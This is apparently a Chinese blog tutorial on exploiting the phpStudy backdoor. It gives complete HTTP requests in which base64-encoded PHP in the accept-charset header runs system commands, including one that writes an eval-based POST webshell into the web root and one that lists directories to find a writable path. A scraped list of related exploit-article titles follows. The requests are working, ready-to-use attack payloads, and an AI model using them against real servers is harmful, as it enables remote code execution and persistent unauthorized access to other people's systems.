0x01 phpstudy利用方法请求任意后缀为php的文件

目标环境为php5.2,5.4,且不能为nts

存在Accept-Encoding: gzip,deflate

此处填写base64加密后的payload:accept-charset: c3lzdGVtKCdjYWxjLmV4ZScpOwGET /phpinfo.php HTTP/1.1

Host: 192.168.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Sec-Fetch-Site: none,

accept-charset: c3lzdGVtKCdjYWxjLmV4ZScpOw

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN,zh;q=0.9

0x02 getshell 远程连接

system('echo ^<?php @eval($_POST["shell"])?^>>PHPTutorial\WWW\shell.php');↓c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=GET /phpinfo.php HTTP/1.1

Host: 192.168.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Sec-Fetch-Site: none,

accept-charset: c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN,zh;q=0.9

0x03 无文件落地getshell利用phpstudy的后门实现无文件落地蚁剑getshell,但有时会不成功,设置完毕后连接即可

0x04 可能会遇到的问题若无法成功连接,可能生成目录不对,执行命令tree /f查看文件树,找到可访问路径生成shellGET /phpinfo.php HTTP/1.1

Host: 192.168.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Sec-Fetch-Site: none,

accept-charset: c3lzdGVtKCd0cmVlIC9mJyk7

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN,zh;q=0.9

php命令执行后门,phpstudy后门利用方法及getshell相关推荐

  1. ImageMagick命令执行漏洞(CVE-2016–3714)利用及测试

    ImageMagick命令执行漏洞(CVE-2016–3714) 5月3日,ImageMagick官方披露称,目前ImageMagick存在一处远程命令执行漏洞(CVE-2016–3714),当其处理 ...

  2. 【渗透测试实战】PHP语言有哪些后门?以及利用方法

    目录 后门 php.ini构成的后门 .user.ini文件构成的PHP后门 反序列化 PHP序列化实现 常见处理器 序列化格式 private与protect PHP反序列化漏洞 利用点 SoapC ...

  3. Web安全 RCE漏洞(命令执行漏洞的 测试和利用).

    系统命令执行的概括 系统命令执行一般是 在Web应用中,可能有时候需要调用一些系统命令来执行,而程序在开发的时候没有对输入进行严格的过滤,导致恶意用户可以构造一些恶意的系统命令,从而达成系统命令执行攻 ...

  4. 绕过WAF运行命令执行漏洞的方法大全

    文章目录 **前言** **一.windows下** 二.进入linux 三.一个有趣的例子 总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深 ...

  5. 浅谈PHP无回显命令执行的利用

    本文首发于先知社区 前言 在CTF题或在一些渗透测试中往往会遇到没有回显的命令执行漏洞,为了能更好的实现对无回显命令执行漏洞的利用,我对此进行了简单总结. 判断方法 命令执行可能会存在命令执行但没有回 ...

  6. CTF之萌新web学习(命令执行2)

    命令执行2 命令执行无回显情况 可控字符串长度限制getshell 15个字符 7个字符 4或5个字符 无字母数字getshell 异或运算 取反 自增 进行实验测试 命令执行无回显情况 判断方法 使 ...

  7. python supervisord 远程命令执行漏洞(CVE-2017-11610)

    Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd. 我觉得它相比Systemd有几个特点: 配置比较简单 ...

  8. DiscuzX系列命令执行分析公开(三连弹)

    tang3 · 2015/01/15 18:55 0x00 漏洞概要 昨天360补天发了这样的一条微博: 然后打听了一下细节,发现居然是我13年7月报给TSRC的漏洞,看今天大家玩的挺开心,与TSRC ...

  9. bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行绕过 反弹shell string分析文件得到密码提权

    bulldog-1靶机 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web漏洞思路 ssh 利用思路 步骤一:浏览网页 爆破目录 步骤二: 破解hash 步骤三:利用 ...

最新文章

  1. 团队作业—第二阶段06
  2. 微型计算机原理实验报告总结,微机原理实验报告-两个多位十进制数相加的实验等.doc...
  3. 【数学基础】概率论——p(x|\theta)和p(x;\theta)的区别
  4. P2055-假期的宿舍【网络流,最大流,最大匹配】
  5. 漫画:高并发下的HashMap
  6. React开发(264):react使用国际化
  7. 微信小程序python_用python一步一步教你玩微信小程序【跳一跳】
  8. matlab定积分矩形法实验,MATLAB实验三 定积分的近似计算
  9. 学校图书馆借阅管理系统软件项目分析
  10. layui表单验证规则
  11. Python matplotlib画图表
  12. 字符串转数字函数 atol、atoll和strtol、strtoll、strtoul、strtoull 分析
  13. Qt实现Toast提示消息
  14. Android使用BottomNavigationView+NavigationUI报错
  15. 直播:京东大数据的应用!
  16. Invalid row number (65536) outside allowable range (0..65535)
  17. 花呗能不能不还?支付宝说春节集五福中彩蛋可帮还
  18. Visual C++ 6.0 ( VC 6 )带 SP6 中英文双语版 下载
  19. initramfs详解-----初识initramfs
  20. 如何安装第三方站点下载的Matlab工具箱或硬件支持包,亲测有效。

热门文章

  1. 【python】无规律时间步长时序数据转为固定步长
  2. 博途PLC 1200/1500PLC MODBUS-RTU通讯优化(状态机编程)
  3. Mysql将某一列值统一拼接一个字符串
  4. iphone和ipad设备分辨率
  5. min4 vs mini5 一定要买 iPad mini5,听我一一道来。
  6. 电力机车电子脚踏开关中霍尔开关的选择DRV5013/CHA442
  7. NNDL 实验六 卷积神经网络(5)使用预训练resnet18实现CIFAR-10分类
  8. 计算机毕业设计JAVA工资管理系统mybatis+源码+调试部署+系统+数据库+lw
  9. pc客户端网易云部分电台节目播放过程中声音消失的问题
  10. winrar 命令行制作自解压安装包